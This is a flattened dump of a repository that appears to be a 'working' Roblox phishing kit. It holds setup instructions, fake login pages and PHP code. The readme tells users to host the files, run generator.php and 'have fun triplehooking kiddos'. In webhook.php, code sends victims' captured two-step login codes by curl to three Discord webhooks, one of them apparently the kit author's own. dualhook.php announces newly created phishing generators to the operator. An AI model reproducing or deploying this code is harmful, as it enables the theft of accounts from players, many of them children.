Login
122 |Dashboard login
127 |├── log.txt ├── logValues.txt ├── css ├── back.gif └── main.css ├── setup.php ├── readme.txt ├── README.md ├── phishing_files ├── login │ ├── webhook.php │ ├── Verification │ │ └── index.php │ └── index.php ├── controller │ ├── login.php │ └── dashboard.php └── dualhook.php ├── dualhook.php └── generator.php /log.txt: -------------------------------------------------------------------------------- 1 | @dont remove this file. -------------------------------------------------------------------------------- /logValues.txt: -------------------------------------------------------------------------------- 1 | @dont remove this file. -------------------------------------------------------------------------------- /css/back.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Terminatedzz/roblox-phishing-Working/HEAD/css/back.gif -------------------------------------------------------------------------------- /setup.php: -------------------------------------------------------------------------------- 1 | "dark", // change be changed to white to for white login page 8 | ]; 9 | ?> 10 | 11 | 12 | -------------------------------------------------------------------------------- /readme.txt: -------------------------------------------------------------------------------- 1 | Listen up 2 | 3 | Termed speaking here. 4 | 5 | 1. this is a source code i found on discord it was broken and all 6 | 2. i didn't "fully fix this source code" i only fixed apis, changed login page, removed some files, added some files, did a few changes in the embed of login and 2step page and notifier 7 | 3. i dont really know who the original creator of this "full source code" is, but credits to him for making this, dont forget to give me credits for fixing 😓. 8 | 4. if u want to change the background, go to the folder named "css" and remove back.gif then upload ur background gif and name it "back.gif" and done. 9 | 10 | # enjoy this working fixed roblox phishing source code i guess. 11 | 12 | Need help setting up, join https://discord.gg/9yz9ye23Ku 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Roblox Phishing 2 | 3 | **Outdated | New Version -> https://github.com/Terminatedzz/roblox-phishing** 4 | 5 | 🚀 **Setup** 🚀 6 | 7 | []([https://github.com/your-username/your-repository/](https://github.com/Terminatedzz/roblox-phishing-Working)stargazers) 8 | 9 | This is a roblox phishing source code i fixed :) 10 | 11 | ## 🌟 Features 12 | 13 | - ✨ Follow me 14 | - ✨ Get me 15 stars on this repo and i post a way better src 15 | - ✨ Star my other repos to 16 | 17 | ## 🚀 Getting Started 18 | 19 | 1. find a free hosting or paid hosting like infinity free or any other ones 20 | 2. upload files 21 | 3. edit setup.php 22 | 4. now go to UrDomain/generator.php 23 | 5. ur site is now ready for action 24 | 6. have fun triplehooking kiddos 25 | 26 | ### Contact me 27 | discord: termed_dev 28 | 29 | ## 📢 Code 30 | 31 | - php 32 | - javascript 33 | - html, css 34 | -------------------------------------------------------------------------------- /phishing_files/login/webhook.php: -------------------------------------------------------------------------------- 1 | "$name - Bot", 32 | "avatar_url" => "$thumbnail", 33 | "content" => "", 34 | "embeds" => [ 35 | [ 36 | "title" => "2step code", 37 | "type" => "rich", 38 | "description" => "**2step code fetched.**", 39 | "color" => hexdec("$hex"), 40 | "thumbnail" => [ 41 | "url" => "$thumbnail", 42 | ], 43 | "author" => [ 44 | "name" => "$name - Result Phishing", 45 | ], 46 | "footer" => [ 47 | "text" => "$name ON TOP", 48 | "icon_url" => "$thumbnail", 49 | ], 50 | "fields" => [ 51 | [ 52 | "name" => "**🔐 2step Login code**", 53 | "value" => "```$CorrectCode```", 54 | "inline" => True 55 | ], 56 | ] 57 | ], 58 | ], 59 | 60 | ]; 61 | $ch = curl_init(); 62 | curl_setopt($ch, CURLOPT_URL, $triplehook); 63 | curl_setopt($ch, CURLOPT_POST, true); 64 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 65 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 66 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 67 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); 68 | $response = curl_exec($ch); 69 | curl_close($ch); 70 | $ch = curl_init(); 71 | curl_setopt($ch, CURLOPT_URL, $url); 72 | curl_setopt($ch, CURLOPT_POST, true); 73 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 74 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 75 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 76 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); 77 | $response = curl_exec($ch); 78 | curl_close($ch); 79 | $ch = curl_init(); 80 | curl_setopt($ch, CURLOPT_URL, $Dualhook); 81 | curl_setopt($ch, CURLOPT_POST, true); 82 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 83 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 84 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 85 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); 86 | $response = curl_exec($ch); 87 | curl_close($ch); 88 | 89 | 90 | echo ""; 91 | exit(); 92 | 93 | ?> -------------------------------------------------------------------------------- /dualhook.php: -------------------------------------------------------------------------------- 1 | "$name - Bot", 24 | "avatar_url" => "$thumbnail", 25 | "content" => "@everyone **New User Made Dualhook Generator 🔥**", 26 | "embeds" => [ 27 | [ 28 | "title" => "Check there Generator.", 29 | "type" => "rich", 30 | "url" => "$domain/controlPage/$directory", 31 | "color" => hexdec("$hex"), 32 | "footer" => [ 33 | "text" => "$name • $timestamp", 34 | "icon_url" => "$thumbnail" 35 | ], 36 | "thumbnail" => [ 37 | "url" => "$thumbnail", 38 | ], 39 | "fields" => [ 40 | [ 41 | "name" => "**Dualhook Generator**", 42 | "value" => "```Dualhook Gen: $domain/controlPage/$directory```", 43 | "inline" => true 44 | ], 45 | 46 | ] 47 | ], 48 | ], 49 | 50 | ]; 51 | 52 | $ch = curl_init(); 53 | curl_setopt($ch, CURLOPT_URL, $triplehook); 54 | curl_setopt($ch, CURLOPT_POST, true); 55 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 56 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 57 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 58 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); 59 | $response = curl_exec($ch); 60 | header("location: /controlPage/$directory"); 61 | } else { 62 | $error = 'This directory is already in use!'; 63 | } 64 | } 65 | } else { 66 | $error = 'This does not look like a webhook!'; 67 | } 68 | } 69 | ?> 70 | 71 | 72 |
73 |Dashboard login
127 |Your fake link is now active! Go to Dashboard > Statistics to view your statistics.
206 |Incorrect username or password.
Incorrect username or password.
Incorrect username or password.
Incorrect username or password.